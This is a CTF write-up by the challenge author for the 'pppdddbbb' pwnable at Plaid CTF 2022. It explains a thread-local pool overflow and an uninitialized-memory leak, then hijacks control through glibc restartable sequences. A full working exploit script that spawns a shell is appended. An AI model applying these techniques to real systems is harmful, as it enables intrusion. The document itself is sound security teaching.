pppdddbbb writeup (Plaid CTF 2022)

Summary

pppdddbbb is a 400pt pwnable in Plaid CTF 2022. Players are given the C++ source code and binary for a toy database program (as well as a Dockerfile allowing players to reproduce the CTF environment locally).

High level details:

  • pppdddbbb implements a multi-versioned key-value store. The database can be viewed as a map from keys to a list of versions representing the history of the key's value. Versions in the history are identified by a sequence number assigned to the transaction which added the version. Deletions are represented by a special tombstone value.
  • Data is stored in a log structured merge tree. The database maintains a "stack" of layers, where incoming writes are always applied to the top-most layer (aka the "mutable" layer). It is possible to "seal" the mutable layer for new writes and create a new, empty mutable layer (which the code calls a "minor compaction"). Sealed layers can be merged together (called a "merge compaction"). When merging layers, the compaction may also discard deleted versions whose sequence numbers have fallen below a user-settable GC watermark sequence number.
  • The database supports multi-key transactions. Transactions acquire locks before attempting to read or write any key. Transactional reads and writes block on locks via a mutex/condition variable. This database doesn't implement any sort of deadlock prevention scheme.

Low level details:

  • The program implements a simple RPC system that multiplexes (potentially concurrently executing) RPCs over a single TCP stream. RPC requests are read off the TCP stream by a single thread, then processed on separate handler threads. A new thread is created for each incoming RPC.
  • Keys are always strings, but values can be of various types: null, string, u32, u64, Vec2, Vec3, and Quaternion.
  • Within each layer, string keys/values are backed by a simple arena allocator.
  • Each Layer owns Version objects, which are heap-allocated. When a layer is destroyed, its Versions aren't freed immediately. Instead, they are appended to a free list (Pool<Version>::items_) in the thread-local storage of the thread that is destroying the layer.
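
For orientation, here is a minimal interaction sketch using the Client, Value, ValueTag, and check_ok helpers defined in the exploit script at the end of this writeup (the address is a placeholder for a local instance built from the provided Dockerfile):

# Assumes the definitions (and `from pwn import *`) from the appended exploit script.
c = Client(remote('127.0.0.1', 1337))

# Begin a transaction, buffer a write, and commit it.
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, b'greeting', Value(ValueTag.STRING, b'hello')))
seq = check_ok(c.commit(tid)).seq  # sequence number assigned to this write

# Read the latest version back (non-transactional read).
print(check_ok(c.read(b'greeting')).value)

# Seal the mutable layer ("minor compaction"), then merge the sealed layers.
layer_id = c.minor_compact().new_mutable_layer_id
c.merge_compact(0, layer_id)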

(Intended) Bugs

Pool buffer overflow

There is no bounds checking when objects are appended to the Pool free list:

template <typename T>
class Pool {
  ...
  void Release(T* obj) { items_[size_++] = obj; }
  ...
  static thread_local Pool<T> pool_;
  static constexpr size_t kMaxSize = 256;
  ...
  size_t size_ = 0;
  T* items_[kMaxSize] = {nullptr};
  ...
};

Appending more than kMaxSize = 256 objects to a pool's free list will write object pointers out of bounds. There is only one type of Pool in the program (Pool<Version>). The pool is located in thread local storage, immediately before the thread descriptor (struct pthread):

+------------------------+------------------------+------------------+
|  ... thread stack ...  |  Pool<Version>::pool_  |  struct pthread  |  <-- top of thread stack
+------------------------+------------------------+------------------+

In summary, this bug allows us to overwrite fields of struct pthread with pointers to Version objects.
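
For scale, here is the count of out-of-bounds releases the appended exploit ends up performing on the target thread; the 2472 constant is the exploit's (build-specific) value for where the rseq_cs pointer sits relative to the overflowed pool:

POOL_MAX_SIZE = 256      # Pool<Version>::kMaxSize from the challenge source
RSEQ_PTR_OFFSET = 2472   # exploit's constant for reaching rseq_area's rseq_cs
                         # pointer in struct pthread (specific to this build)

# The first 256 releases fill items_[] in bounds; every further release
# writes one Version* (8 bytes) deeper into struct pthread. The exact -1
# adjustment reflects how the pool lines up against the thread descriptor.
num_overflow_versions = POOL_MAX_SIZE + RSEQ_PTR_OFFSET // 8 - 1  # = 564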

Memory disclosure in debug tracing

The program comes with debug tracing functionality which logs information about its operations into a trace buffer which can be read back by the client. The tracing in the Read RPC attempts to pretty-print the value that was read. This pretty-printing incorrectly assumes that string values are null-terminated strings:

std::string DebugString(const Value& value) {
  return std::visit(
      overloaded{
          ...
          [](std::string_view v) { return StrFormat("\"%s\"", v.data()); },
          ...
      },
      value);
}

This can be abused to leak uninitialized memory from a layer's arena, where string values are stored.
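
Concretely, the leak primitive looks like the write_str/trace_read pair from the appended exploit: commit a string value (the arena copy is not NUL-terminated), read it back with tracing on, and parse the leaked bytes out of the trace:

def write_str(key, value):
    # Commit a string value; Layer::ArenaString() copies it into the arena
    # without writing a terminating NUL.
    tid = c.begin_transaction().tid
    check_ok(c.buffer_mutation(tid, key, Value(ValueTag.STRING, value)))
    check_ok(c.commit(tid))

def trace_read(key):
    # DebugString() formats the value with "%s", so it keeps printing past
    # the end of the value until it happens to hit a zero byte.
    c.set_trace_enabled(True)
    check_ok(c.read(key))
    trace = c.flush_trace().trace
    c.set_trace_enabled(False)
    # Trace lines look like: Read <key> -> "<value plus leaked bytes>"
    return trace.split(b' -> "', 1)[1].rsplit(b'"', 1)[0]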

Exploitation

Leaking addresses

The exploit starts with leaking libc, binary, and heap addresses using the memory disclosure bug. The general strategy will be to:

  1. Allocate and free some Transaction objects.
  2. Get a Layer arena block to be allocated over the freed Transaction objects.
  3. Write a non-null-terminated value into the layer so that an address appears immediately after the value, then read back the value with debug tracing enabled. This should leak the address into the debug trace.

This should give us all of the addresses we need:

  • A libc address via next/prev pointers in heap metadata pointing into main_arena in libc's .data section.
  • A binary base address via Transaction::table_ pointing into the binary's .data section.
  • A heap address via either pointers in Transaction or heap metadata.
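
Assuming the leaked neighbors are the ones we want (arranging that is what the next paragraphs are about), the leaked low 6 bytes of each pointer are rebased with fixed offsets measured against the provided libc and binary. The lengths and offsets below come straight from the appended exploit and only apply to those exact builds:

key = b'k' * 7   # key/value sizes below are part of the exploit's heap grooming

write_str(key, b'v' * 0xd0)   # bytes after the value: a main_arena pointer
libc_base = u64(trace_read(key)[-6:] + b'\0\0') - 0x219da0

write_str(key, b'v' * 0x1f)   # bytes after the value: Transaction::table_,
                              # which points into the binary's .data
binary_base = u64(trace_read(key)[-6:] + b'\0\0') - 0x13018

write_str(key, b'v' * 0x7)    # bytes after the value: a heap pointer
block_addr = u64(trace_read(key)[-6:] + b'\0\0') - 0x110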

This mostly works, except for one detail - the program makes heavy use of threads, so most allocations will happen on separate per-thread arenas and not main_arena. These other arenas are mmapped (as opposed to main_arena, which lives in glibc's .data section). Our technique for leaking pointers into an arena will only give us a libc address if the arena is main_arena.

Our exploit works around this by forcing allocations to happen on a thread which reuses main_arena. Doing so requires understanding how glibc malloc assigns arenas to threads:

  • When possible, glibc wants to avoid assigning the same arena to multiple threads, as those threads may contend on the arena lock.
  • However, glibc is also unwilling to create too many arenas beyond some limit. The default limit on x86-64 is num_cores * 8. The problem explicitly sets the limit to 8 (mallopt(M_ARENA_MAX, 8)) so that players don't need to figure out the number of cores on the challenge server.
  • The first time a thread performs an allocation, it obtains an arena as follows:
    1. Check a free list of arenas that are in use by 0 threads. If it is not empty, remove an entry from the free list and return it.
    2. If the number of arenas is below the limit, create a new arena and return it.
    3. Otherwise, reuse an arena that may already be in use by another thread. The function responsible for this (reused_arena) round-robins across all currently in-use arenas.
  • On thread shutdown, if the thread is the only user of its malloc arena, then the arena is returned to the arena free list.

With this understanding, we can force main_arena to be reused as follows:

  1. Start MAX_ARENAS - 1 threads. On each thread, perform some allocation, then block (so that its arena is not returned to the arena free list). This causes the process to have MAX_ARENAS arenas (including main_arena).
  2. Every time we want to allocate something on main_arena, we ensure that main_arena is the next arena in the round-robin sequence (next_to_use in reused_arena). We can arrange for this to happen by performing dummy requests as needed to advance next_to_use.

Our exploit accomplishes (1) by starting a transaction that locks a database key, then starting MAX_ARENAS - 1 new transactions that all try to read the locked key. Those threads will now block waiting on the transactional lock.
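
A sketch of both steps using the appended exploit's client (the padding counts for advancing next_to_use are empirical and copied from the exploit):

MAX_ARENAS = 8  # matches mallopt(M_ARENA_MAX, 8) in the challenge binary

# Step 1: tie up the non-main arenas. One transaction holds the lock on
# 'conflict'; each subsequent read RPC runs on a fresh thread, allocates
# (tracing is on), and then blocks on that lock, so its arena stays in use.
blocker = c.begin_transaction().tid
check_ok(c.read(b'conflict', tid=blocker))

blocked_tids = [c.begin_transaction().tid for _ in range(MAX_ARENAS - 1)]
c.set_trace_enabled(True)  # make the blocked reads allocate before blocking
for tid in blocked_tids:
    c.read(b'conflict', tid=tid, sync=False)

# Step 2: before an allocation we want on main_arena, advance reused_arena's
# next_to_use cursor with cheap dummy RPCs (each runs on a new thread).
for _ in range(MAX_ARENAS - 4):   # empirical padding count from the exploit
    c.set_trace_enabled(False)
t1 = c.begin_transaction().tid    # this Transaction is allocated on main_arena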

With this, we are able to leak libc, binary, and heap addresses using the same methods as in a single-threaded program.

Getting code execution

The intended solution makes use of a relatively new feature added in glibc 2.35: restartable sequences support.

The intent was for players to reason that the TLS overwrite must overwrite the stack canary, so the exploit has to gain code execution before returning from any function with a stack canary. The hope was that this would eliminate most of the overwrite targets in struct pthread aside from the intended one.

Restartable sequences background

Most developers are familiar with thread-local data and how they can avoid the need for locking - however, sometimes we'd prefer to maintain an object per-CPU rather than per-thread. Use cases for per-CPU objects include things like allocator free lists and cheap stats counters. Restartable sequences provide a mechanism for the kernel to inform a task if it has been preempted within a particular critical section of code. Specifically, before entering a critical section, a userspace thread writes a pointer to this structure to a memory location (inside rseq_area in struct pthread) that has been preregistered with the kernel in advance:

struct rseq_cs {
  uint32_t version;
  uint32_t flags;
  uint64_t start_ip;
  uint64_t post_commit_offset;
  uint64_t abort_ip;
};

When returning to userspace, the kernel will examine this structure. If it has interrupted the thread while it was executing an instruction in [start_ip, start_ip + post_commit_offset), then the kernel will change the instruction pointer to abort_ip.

This is pretty exciting from an exploiter's perspective, as it adds a potential control flow edge from anywhere in the program (even an infinite loop) to this abort_ip. However, the designers of this API were aware of the dangers of allowing jumps to arbitrary instructions, so they added the following restriction:

When a program registers a thread for restartable sequences (via the rseq system call), it provides a 32-bit "signature" value. The kernel will only jump to abort_ip addresses if the 32-bit value at abort_ip - 4 matches this signature.

On x86-64, glibc uses a signature of 0x53053053.

This severely limits the number of targets that we can redirect control to. Luckily, one of the targets still ends up working out! (Author note: during the initial brainstorming for this problem, I was even considering adding a JIT to make it possible to introduce additional abort targets.)
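
Finding the candidate targets is just a byte search over the provided libc for the signature, for example with pwntools (the libc path is a placeholder for the copy extracted from the challenge's Docker image):

from pwn import ELF, p32

RSEQ_SIG = 0x53053053  # glibc's x86-64 rseq signature

# Every occurrence of the signature bytes makes the address right after it
# a kernel-accepted abort_ip.
libc = ELF('./libc.so.6')
for sig_addr in libc.search(p32(RSEQ_SIG)):
    print(f'candidate abort_ip: {hex(sig_addr + 4)}')
# For this libc there is exactly one hit, inside start_thread().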

Restartable sequences gadget

The libc version in question contains only one occurrence of the signature value - it shows up in thread startup code, where a thread registers with the kernel to enable restartable sequences:

   94aed:       41 ba 53 30 05 53       mov    r10d,0x53053053  # RSEQ_SIG
   94af3:       31 d2                   xor    edx,edx          # <-- valid abort_ip
   94af5:       be 20 00 00 00          mov    esi,0x20
   94afa:       48 8d b8 a0 09 00 00    lea    rdi,[rax+0x9a0]
   94b01:       b8 4e 01 00 00          mov    eax,0x14e
   94b06:       0f 05                   syscall
   ...

This happens inside start_thread. The above assembly comes from rseq_register_current_thread, which has been inlined into this function:

start_thread (void *arg)
{
  ...
  {
    bool do_rseq = THREAD_GETMEM (pd, flags) & ATTR_FLAG_DO_RSEQ;
    if (!rseq_register_current_thread (pd, do_rseq) && do_rseq)
      __libc_fatal ("Fatal glibc error: rseq registration failed\n");
  }
  ...
        ret = pd->start_routine (pd->arg);
  ...
}

Walking further past the end of the above assembly snippet, we find that as long as do_rseq is false (r8d is 0), pd (a struct pthread*) will be loaded from [rsp+8], and the code will call a function pointer/argument loaded from pd.

Putting it all together

We now have all of the addresses we need and a single gadget that we can use as the abort_ip for our rseq_cs pointer overwrite. At this point, it makes sense to think about what context we would like to trigger restartable sequence abort from. Here are the requirements:

  1. It must be from the thread where we triggered the version pool overflow, since we are only able to overwrite the rseq_cs pointer for that thread.
  2. We need r8d = 0 and [rsp+8] to point to a fake struct pthread we control.
  3. r8d and rsp should be stable in the "critical section" we register - otherwise, the exploit would crash if the thread was preempted at an inconvenient time.

This is where the (unfortunately super contrived) CopyHandler::Backdoor() function comes in. This function is written to meet all of the above requirements - it gives us r8 = 0, lets us control [rsp+8], and then enters an infinite spinloop where both r8 and rsp are stable. That spin loop will be our restartable sequences "critical section." (Author note: I was originally hoping to find a more natural/sneaky way to introduce these conditions, but I ran out of development time before the CTF :-/)

All that remains is to trigger the TLS overflow bug immediately before a call to CopyHandler::Backdoor(). Specifically, we want to ensure that CopyHandler ends up releasing the last reference to a Layer. Once again, we make use of transactional locks to block and unblock threads. CopyHandler performs a transaction which reads a value for a key, then writes that value into another key. The value that CopyHandler reads holds a reference to the Layer that the value came from. We can keep that reference alive across a merge compaction as follows:

  1. Start a transaction T, and have it take a lock on key 'b'
  2. Start a copy RPC copying from 'a' to 'b'. The copy will read 'a' (and grab a reference to the value's Layer) then block waiting on acquiring a lock for 'b'.
  3. Perform a merge compaction that discards the aforementioned layer. Now the copy RPC holds the single reference to this layer (see the sketch below).
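
In code, using the appended exploit's client, where layer_id is the id of the sealed layer from an earlier minor compaction and copy_payload is the fake-stack data for Backdoor() described a bit further down:

# 1. Take and hold the lock on 'b' with a separate transaction.
blocker = c.begin_transaction().tid
check_ok(c.read(b'b', tid=blocker))

# 2. Copy 'a' -> 'b'. The copy RPC reads 'a' (keeping a reference to that
#    value's Layer via the ReadResult) and then blocks in Commit() while
#    trying to lock 'b'. The third argument is CopyHandler's data_, which
#    Backdoor() later copies onto its stack.
c.copy(b'a', b'b', copy_payload, sync=False)

# 3. Merge-compact the layer away. The blocked copy RPC now holds the only
#    remaining reference to it.
c.merge_compact(0, layer_id)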

Our exploit sets up the layer in question so that it has enough versions to overflow the Version pool and overwrite the thread's rseq_cs pointer. The rseq_cs pointer will be overwritten with a pointer to a Version containing a Quaternion we control, which will be interpreted as a struct rseq_cs.
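
In code, the fake rseq_cs is just a Quaternion whose four u64 lanes line up with the struct's fields; the loop_start/loop_end/gadget offsets below are the build-specific values from the appended exploit:

loop_start  = binary_base + 0xd99b     # start of Backdoor()'s spin loop
loop_end    = binary_base + 0xda01     # end of the spin loop
rseq_gadget = libc_base + 0x94af3      # instruction after `mov r10d, RSEQ_SIG`

fake_rseq_cs = (
    0,                       # version (u32) and flags (u32), both zero
    loop_start,              # start_ip
    loop_end - loop_start,   # post_commit_offset
    rseq_gadget,             # abort_ip
)
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, b'k', Value(ValueTag.QUATERNION, fake_rseq_cs)))
check_ok(c.commit(tid))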

At this point, we can abort the transaction T and release its locks. This unblocks the copy RPC, which releases the last Layer reference and destroys the layer, triggering the TLS overflow. The thread then enters an infinite loop with r8d = 0 and [rsp+8] pointing to a fake struct pthread with start_routine = system and arg = "/bin/sh". When the kernel preempts this thread, it sees the rseq_cs we have installed and sets rip to our restartable sequences gadget, which calls system("/bin/sh") and gives us a shell.
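
For completeness, the fake struct pthread is itself fabricated from data we already control on the heap; the constants are again the exploit's build-specific values:

# start_routine/arg live at a fixed offset (200 * 8 bytes in this build)
# inside struct pthread, so we park system/"/bin/sh" pointers in a string
# value and pass a suitably rebased pointer as the copy RPC's extra data.
# Backdoor() copies that data onto its stack, leaving the rebased pointer
# at [rsp+8].
system_addr = libc_base + 0x50d60
binsh_addr  = libc_base + 0x1d8698
write_str(b'AAAAAA', p64(system_addr) + p64(binsh_addr))

fake_thread_func_addr = block_addr + 0x110          # where the two qwords land
copy_payload = p64(0) + p64(fake_thread_func_addr - 200 * 8)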

Conclusion

Problems with this much code can be a lot of work to write and solve, but I like the idea of challenges that have a greater amount of functionality, and provide exploit primitives that can be combined/sequenced in many different ways (e.g. thread blocking and reference manipulation in this challenge).

Thank you for making it all the way here! Even if nobody ended up solving this during the CTF (or the week after), I hope it was a fun challenge to play, or at least to read the writeup for!

Obligatory flag:

$ ./exploit.py
[+] Opening connection to pppdddbbb.chal.pwni.ng on port 1337: Done
[*] libc_base = 0x7fa21ab07000
[*] binary_base = 0x55733c66b000
[*] block_addr = 0x55733c96fc90
[+] Writing overflow versions: Done
[*] Switching to interactive mode
\x03\x00\x00\x00\x00$
$ cat flag.txt
PCTF{TLS_in_yoTLS_in_your_LSM}
#!/usr/bin/env python
from pwn import *
from dataclasses import dataclass
from enum import Enum
from functools import wraps
from typing import Any, Union, Optional
context.update(arch='amd64', os='linux')
class Command(Enum):
READ = 0
BEGIN_TRANSACTION = 1
BUFFER_MUTATION = 2
COMMIT = 3
ABORT = 4
MINOR_COMPACT = 5
MERGE_COMPACT = 6
SET_GC_WATERMARK = 7
SET_TRACE_ENABLED = 8
FLUSH_TRACE = 9
COPY = 10
class ValueTag(Enum):
NULL = 0
STRING = 1
U32 = 2
U64 = 3
VEC2 = 4
VEC3 = 5
QUATERNION = 6
@dataclass
class Value:
tag: ValueTag
value: Any = None
INVALID_TID = 0
MAX_SEQUENCE_NUMBER = (1 << 64) - 1
def p1(b):
return bytes([b])
@dataclass
class RequestState:
command: Command
response: Any = None
@dataclass
class ReadResponse:
error: bytes
value: Optional[Any] = None
@dataclass
class BeginTransactiondResponse:
tid: int
@dataclass
class BufferMutationResponse:
error: bytes
@dataclass
class CommitResponse:
error: bytes
seq: int
@dataclass
class AbortResponse:
error: bytes
@dataclass
class MinorCompactResponse:
new_mutable_layer_id: int
@dataclass
class SetGcWatermarkResponse:
error: bytes
@dataclass
class FlushTraceResponse:
trace: bytes
@dataclass
class CopyResponse:
error: bytes
@dataclass
class EmptyResponse:
pass
DO_SLEEP = False
# Wrapper for client RPC methods allowing them to be run either
# synchronously or asynchronously.
def maybe_sync(f):
@wraps(f)
def wrapper(*args, **kwargs):
sync = kwargs.pop('sync', True)
rid = f(*args, **kwargs)
if DO_SLEEP:
# Sleep to give the request handler thread time to finish before
# sending the next call. This was useful during local exploit
# development, but it wasn't needed in practice when exploiting
# over the network.
sleep(0.1)
if sync:
return args[0].wait_for_response(rid)
return rid
return wrapper
class Client(object):
def __init__(self, conn):
self.conn = conn
self.next_request_id = 0
self.requests = {}
magic = self.conn.recvn(16)
MAGIC = b'PPPDDDBBB_1.0'.ljust(16, b'\0')
assert magic == MAGIC, magic
def _get_request_id(self, request_type):
rid = self.next_request_id
self.next_request_id += 1
self.requests[rid] = RequestState(request_type)
return rid
def _marshal_string(self, b):
return p16(len(b)) + b
def _read_u16(self):
return u16(self.conn.recvn(2))
def _read_u32(self):
return u32(self.conn.recvn(4))
def _read_u64(self):
return u64(self.conn.recvn(8))
def _read_string(self):
size = self._read_u16()
return self.conn.recvn(size)
def _request_header(self, command):
rid = self._get_request_id(command)
return rid, p1(command.value) + p64(rid)
def _read_value(self):
tag = self.conn.recvn(1)[0]
if tag == ValueTag.NULL.value:
value = None
elif tag == ValueTag.STRING.value:
value = self._read_string()
elif tag == ValueTag.U32.value:
value = self._read_u32()
elif tag == ValueTag.U64.value:
value = self._read_u64()
elif tag == ValueTag.VEC2.value:
value = (self._read_u64(), self._read_u64())
elif tag == ValueTag.VEC3.value:
value = (self._read_u64(), self._read_u64(), self._read_u64())
elif tag == ValueTag.QUATERNION.value:
value = (self._read_u64(), self._read_u64(), self._read_u64(), self._read_u64())
else:
raise 'Invalid value'
return Value(ValueTag(tag), value)
def _read_response(self):
rid = self._read_u64()
assert rid in self.requests, rid
request_state = self.requests[rid]
if request_state.command == Command.READ:
error = self._read_string()
value = self._read_value()
request_state.response = ReadResponse(error, value)
elif request_state.command == Command.BEGIN_TRANSACTION:
tid = self._read_u64()
request_state.response = BeginTransactiondResponse(tid)
elif request_state.command == Command.BUFFER_MUTATION:
error = self._read_string()
request_state.response = BufferMutationResponse(error)
elif request_state.command == Command.COMMIT:
error = self._read_string()
seq = self._read_u64()
request_state.response = CommitResponse(error, seq)
elif request_state.command == Command.ABORT:
error = self._read_string()
request_state.response = AbortResponse(error)
elif request_state.command == Command.MINOR_COMPACT:
new_mutable_layer_id = self._read_u64()
request_state.response = MinorCompactResponse(new_mutable_layer_id)
elif request_state.command == Command.MERGE_COMPACT:
request_state.response = EmptyResponse()
elif request_state.command == Command.SET_GC_WATERMARK:
error = self._read_string()
request_state.response = SetGcWatermarkResponse(error)
elif request_state.command == Command.SET_TRACE_ENABLED:
request_state.response = EmptyResponse()
elif request_state.command == Command.FLUSH_TRACE:
trace = self._read_string()
request_state.response = FlushTraceResponse(trace)
elif request_state.command == Command.COPY:
error = self._read_string()
request_state.response = CopyResponse(error)
else:
raise 'Invalid command'
def wait_for_response(self, rid):
assert rid in self.requests, rid
request_state = self.requests[rid]
while request_state.response is None:
self._read_response()
return request_state.response
@maybe_sync
def read(self, key, seq=MAX_SEQUENCE_NUMBER, tid=INVALID_TID):
rid, data = self._request_header(Command.READ)
data += p64(tid)
data += p64(seq)
data += self._marshal_string(key)
self.conn.send(data)
return rid
@maybe_sync
def begin_transaction(self):
rid, data = self._request_header(Command.BEGIN_TRANSACTION)
self.conn.send(data)
return rid
@maybe_sync
def buffer_mutation(self, tid, key, value):
rid, data = self._request_header(Command.BUFFER_MUTATION)
data += p64(tid)
data += self._marshal_string(key)
data += p1(value.tag.value)
if value.tag == ValueTag.NULL:
pass
elif value.tag == ValueTag.STRING:
data += self._marshal_string(value.value)
elif value.tag == ValueTag.U32:
data += p32(value.value)
elif value.tag == ValueTag.U64:
data += p64(value.value)
elif value.tag == ValueTag.VEC2 or value.tag == ValueTag.VEC3 or value.tag == ValueTag.QUATERNION:
for e in value.value:
data += p64(e)
else:
raise 'Unsupported value type'
self.conn.send(data)
return rid
@maybe_sync
def commit(self, tid):
rid, data = self._request_header(Command.COMMIT)
data += p64(tid)
self.conn.send(data)
return rid
@maybe_sync
def abort(self, tid):
rid, data = self._request_header(Command.ABORT)
data += p64(tid)
self.conn.send(data)
return rid
@maybe_sync
def minor_compact(self):
rid, data = self._request_header(Command.MINOR_COMPACT)
self.conn.send(data)
return rid
@maybe_sync
def merge_compact(self, start, limit):
rid, data = self._request_header(Command.MERGE_COMPACT)
data += p64(start)
data += p64(limit)
self.conn.send(data)
return rid
@maybe_sync
def set_gc_watermark(self, gc_watermark):
rid, data = self._request_header(Command.SET_GC_WATERMARK)
data += p64(gc_watermark)
self.conn.send(data)
return rid
@maybe_sync
def set_trace_enabled(self, enabled):
rid, data = self._request_header(Command.SET_TRACE_ENABLED)
data += p1(enabled)
self.conn.send(data)
return rid
@maybe_sync
def flush_trace(self):
rid, data = self._request_header(Command.FLUSH_TRACE)
self.conn.send(data)
return rid
@maybe_sync
def copy(self, a, b, c):
rid, data = self._request_header(Command.COPY)
data += self._marshal_string(a)
data += self._marshal_string(b)
data += self._marshal_string(c)
self.conn.send(data)
return rid
def check_ok(response):
if hasattr(response, 'error'):
assert len(response.error) == 0, response.error
return response
conn = remote('pppdddbbb.chal.pwni.ng', 1337)
c = Client(conn)
blocker = c.begin_transaction().tid
check_ok(c.read(b'conflict', tid=blocker))
MAX_ARENAS = 8
# Exhaust arenas by starting a bunch of blocked threads. The threads
# will be blocked waiting on a lock on 'conflict'.
blocked_tids = []
for _ in range(MAX_ARENAS - 1):
blocked_tids.append(c.begin_transaction().tid)
# Ensure reads allocate (so that an arena is assigned to their threads).
c.set_trace_enabled(True)
for blocked_tid in blocked_tids:
c.read(b'conflict', tid=blocked_tid, sync=False)
# Uses first arena after main_arena.
c.set_trace_enabled(False)
insert_tid = c.begin_transaction().tid
key = b'k' * 7
check_ok(c.buffer_mutation(insert_tid, key, Value(ValueTag.STRING, b'v' * 7)))
for _ in range(MAX_ARENAS - 4):
c.set_trace_enabled(False)
# Allocate the Transaction objects for t1 and t2 on main_arena.
t1 = c.begin_transaction().tid
for _ in range(MAX_ARENAS - 1):
c.set_trace_enabled(False)
t2 = c.begin_transaction().tid
for _ in range(MAX_ARENAS - 1):
c.set_trace_enabled(False)
t3 = c.begin_transaction().tid
check_ok(c.abort(t2))
check_ok(c.abort(t1))
check_ok(c.abort(t3))
for _ in range(MAX_ARENAS - 4):
c.set_trace_enabled(False)
# Allocate the block for insert_tid's key/value on main_arena.
check_ok(c.commit(insert_tid))
def write_str(key, value):
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.STRING, value)))
check_ok(c.commit(tid))
# Reads the given key using the tracing functionality, which can leak
# memory because it incorrectly assumes that keys/values are
# null-terminated.
def trace_read(key):
c.set_trace_enabled(True)
check_ok(c.read(key))
trace = c.flush_trace().trace
c.set_trace_enabled(False)
return trace.split(b' -> "', 1)[1].rsplit(b'"', 1)[0]
write_str(key, b'v' * 0xd0)
leak = trace_read(key)
main_arena_addr = u64(leak[-6:] + b'\0\0')
libc_base = main_arena_addr - 0x219da0
log.info(f'libc_base = {hex(libc_base)}')
write_str(key, b'v' * 0x1f)
leak = trace_read(key)
table_addr = u64(leak[-6:] + b'\0\0')
binary_base = table_addr - 0x13018
log.info(f'binary_base = {hex(binary_base)}')
write_str(key, b'v' * 0x7)
leak = trace_read(key)
heap_addr = u64(leak[-6:] + b'\0\0')
#block_addr = heap_addr - 0xc8
block_addr = heap_addr - 0x110
log.info(f'block_addr = {hex(block_addr)}')
# Points to the instruction after `mov r10d, 0x53053053` in
# `start_thread()`. Requires: r8 = 0 and [rsp+8] is a pointer to a fake
# `struct pthread`. If these conditions are satisfied, it will call
# `fake_pthread->start_routine(fake_pthread->arg)`.
rseq_gadget = libc_base + 0x94af3;
system = libc_base + 0x50d60
binsh = libc_base + 0x1d8698
payload = b''
payload += p64(system)
payload += p64(binsh)
write_str(b'AAAAAA', payload)
fake_thread_func_addr = block_addr + 0x110
DO_SLEEP = False
# Clean up blocked transactions/values from the leaking step.
check_ok(c.abort(blocker))
rids = []
for blocked_tid in blocked_tids:
rids.append(c.abort(blocked_tid, sync=False))
for rid in rids:
check_ok(c.wait_for_response(rid))
tid = c.begin_transaction().tid
for key in [b'key', b'conflict']:
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.NULL)))
delete_seq = check_ok(c.commit(tid)).seq
layer_id = c.minor_compact().new_mutable_layer_id
check_ok(c.set_gc_watermark(delete_seq))
c.merge_compact(0, layer_id)
loop_start = binary_base + 0xd99b
loop_end = binary_base + 0xda01
key = b'k'
# This quaternion will be interpreted as a `struct rseq_cs`.
quat = (
0, # version, flags
loop_start, # start_ip,
loop_end - loop_start, # post_commit_offset
rseq_gadget, # abort_ip
)
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.QUATERNION, quat)))
seq = check_ok(c.commit(tid)).seq
# Insert and delete a bunch of values so that when this layer is
# destroyed, a pointer to the above quaternion will be written over
# `rseq_area.rseq_cs.ptr` in `struct pthread`.
POOL_MAX_SIZE = 256
RSEQ_PTR_OFFSET = 2472
with log.progress('Writing overflow versions') as p:
num_values = POOL_MAX_SIZE + RSEQ_PTR_OFFSET // 8 - 1
for i in range(num_values):
p.status(f'{i} / {num_values}')
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.NULL)))
check_ok(c.commit(tid))
tid = c.begin_transaction().tid
check_ok(c.buffer_mutation(tid, key, Value(ValueTag.NULL)))
delete_seq = check_ok(c.commit(tid)).seq
layer_id = c.minor_compact().new_mutable_layer_id
check_ok(c.set_gc_watermark(delete_seq))
write_str(b'a', b'value')
# If we were to merge compact [0, layer_id) now, then layer destruction
# (and thus the TLS overwrite) would happen on the merge compaction
# thread. The program would crash before returning from `Compact()`, as
# the TLS overwrite has overwritten the stack canary in TLS. Prevent
# this from happening by starting a copy RPC whose transaction commit is
# blocked on a lock. The blocked copy RPC will keep a reference to the
# layer via the `ReadResult` from the read it perform.
blocker = c.begin_transaction().tid
check_ok(c.read(b'b', tid=blocker))
stack = b''
stack += p64(0)
stack += p64(fake_thread_func_addr - 200 * 8)
c.copy(b'a', b'b', stack, sync=False)
c.merge_compact(0, layer_id)
# Unblock the copy RPC. Now, the copy RPC will enter the "backdoor"
# function, which meets the conditions for gaining RIP control via
# `rseq_gadget`.
check_ok(c.abort(blocker, sync=False))
conn.interactive(prompt='$ ')
#include <emmintrin.h>
#include <fcntl.h>
#include <inttypes.h>
#include <malloc.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <algorithm>
#include <atomic>
#include <condition_variable>
#include <functional>
#include <limits>
#include <list>
#include <map>
#include <memory>
#include <mutex>
#include <optional>
#include <set>
#include <shared_mutex>
#include <span>
#include <string>
#include <string_view>
#include <thread>
#include <tuple>
#include <variant>
#include <vector>
#define CHECK(condition) \
do { \
if (!(condition)) { \
CheckFailure("Check failed at %s:%d: %s\n", __FILE__, __LINE__, \
#condition); \
} \
} while (0);
#define PCHECK(condition) \
do { \
if (!(condition)) { \
CheckFailure("Check failed at %s:%d (%m): %s\n", __FILE__, __LINE__, \
#condition); \
} \
} while (0);
void CheckFailure(const char* format, ...) {
// asm("int3");
va_list ap;
va_start(ap, format);
vfprintf(stderr, format, ap);
va_end(ap);
abort();
}
template <typename Fn, typename... Args>
auto HandleEINTR(Fn fn, Args... args) -> decltype(fn(args...)) {
decltype(fn(args...)) result;
errno = 0;
do {
result = fn(args...);
} while (result == -1 && errno == EINTR);
return result;
}
ssize_t ReadLen(int fd, void* buf, size_t n) {
uint8_t* ptr = reinterpret_cast<uint8_t*>(buf);
ssize_t nread = 0;
while (nread < n) {
const ssize_t rc = HandleEINTR(read, fd, ptr + nread, n - nread);
if (rc < 0) {
return rc;
}
if (rc == 0) {
break;
}
nread += rc;
}
return nread;
}
ssize_t WriteLen(int fd, const void* buf, size_t n) {
const uint8_t* ptr = reinterpret_cast<const uint8_t*>(buf);
ssize_t nwritten = 0;
while (nwritten < n) {
const ssize_t rc = HandleEINTR(write, fd, ptr + nwritten, n - nwritten);
if (rc < 0) {
return rc;
}
nwritten += rc;
}
return nwritten;
}
